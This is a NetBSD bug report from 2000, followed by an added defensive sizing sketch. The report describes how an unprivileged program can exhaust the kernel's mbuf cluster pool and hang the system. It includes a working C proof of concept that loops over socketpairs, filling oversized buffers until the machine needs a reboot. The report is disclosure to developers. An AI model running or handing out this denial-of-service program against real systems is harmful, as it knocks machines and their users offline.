Subject: kern/9347: user program can exhaust mclpool and hang system
To: None
From: Erik E. Fair
List: netbsd-bugs
Date: 02/03/2000 19:24:38
>Number:         9347
>Category:       kern
>Synopsis:       user program can exhaust mclpool and hang system
>Confidential:   yes
>Severity:       critical
>Priority:       high
>Responsible:    kern-bug-people (Kernel Bug People)
>State:          open
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Thu Feb  3 19:24:00 2000
>Originator:     Erik E. Fair
	International Organization of Internet Clock Watchers
>Release:        1.4.2_ALPHA
System: NetBSD 1.4.2_ALPHA NetBSD 1.4.2_ALPHA (DIGITAL) #10: Mon Jan 10 22:38:56 PST 2000 alpha

	A user program playing with socket buffer options and
	socketpair(2) can exhaust the mclpool, and hang the system:

	WARNING: mclpool limit reached; increase NMBCLUSTERS

	The process is unkillable. This can be used to hang a NetBSD
	system in such a way that a reboot is required to regain
	control of the system.

	Userland programs should not be able to do this.

	This code has been tested on 1.4.2_ALPHA kernels for sparc and alpha:

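#include        <unistd.h>
#include        <sys/socket.h>
#include        <fcntl.h>

#define         BUFFERSIZE      204800

extern  int
main(void)
{
        int             p[2], i;
        char            crap[BUFFERSIZE];

        while (1) {
                /* stop when no more pairs can be created (the statement
                   is missing from the archived copy; break is assumed) */
                if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
                        break;
                i = BUFFERSIZE;
                /* request large send and receive buffers on both ends */
                setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                /* non-blocking, so a full buffer does not stall the loop */
                fcntl(p[0], F_SETFL, O_NONBLOCK);
                fcntl(p[1], F_SETFL, O_NONBLOCK);
                /* fill both directions; nothing ever reads the data */
                write(p[0], crap, BUFFERSIZE);
                write(p[1], crap, BUFFERSIZE);
        }
        return 0;
}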
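
Added example (not part of the original report or of NetBSD): a C audit sketch that estimates how much unread socketpair data a single process could leave queued, using the descriptor limit and the send buffer size the kernel reports for the report's 204800-byte request. The function names and the one-full-buffer-per-descriptor ceiling are assumptions of this example; it writes no data to any socket.

```c
/* Added example: sizing estimate only, nothing is written to a socket. */
#include <stdio.h>
#include <unistd.h>
#include <sys/resource.h>
#include <sys/socket.h>

#define REQUESTED 204800 /* BUFFERSIZE in the report */

/* Request `want` bytes of SO_SNDBUF on a throwaway socketpair and return
 * the size the kernel reports back, or -1 on error. */
long granted_sndbuf(int want)
{
    int p[2], got = 0;
    socklen_t len = sizeof(got);
    long result = -1;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
        return -1;
    if (setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &want, sizeof(want)) == 0 &&
        getsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &got, &len) == 0)
        result = got;
    close(p[0]);
    close(p[1]);
    return result;
}

/* Assumed rough ceiling: each descriptor is one endpoint of a pair and can
 * hold one full buffer of unread data. Ignores per-mbuf overhead. */
long long worst_case_bytes(long nofile, long per_socket)
{
    if (nofile < 0 || per_socket < 0)
        return -1;
    return (long long)(nofile - nofile % 2) * per_socket;
}

int main(void)
{
    struct rlimit rl;
    long per = granted_sndbuf(REQUESTED);

    if (per < 0 || getrlimit(RLIMIT_NOFILE, &rl) == -1)
        return 1;
    if (rl.rlim_cur == RLIM_INFINITY) {
        puts("RLIMIT_NOFILE is unlimited: no per-process ceiling");
        return 0;
    }
    printf("per-socket %ld bytes, %ld descriptors, ceiling %lld bytes\n",
           per, (long)rl.rlim_cur, worst_case_bytes((long)rl.rlim_cur, per));
    return 0;
}
```

A ceiling larger than the memory behind the cluster pool means the descriptor limit alone does not protect the pool from one unprivileged process.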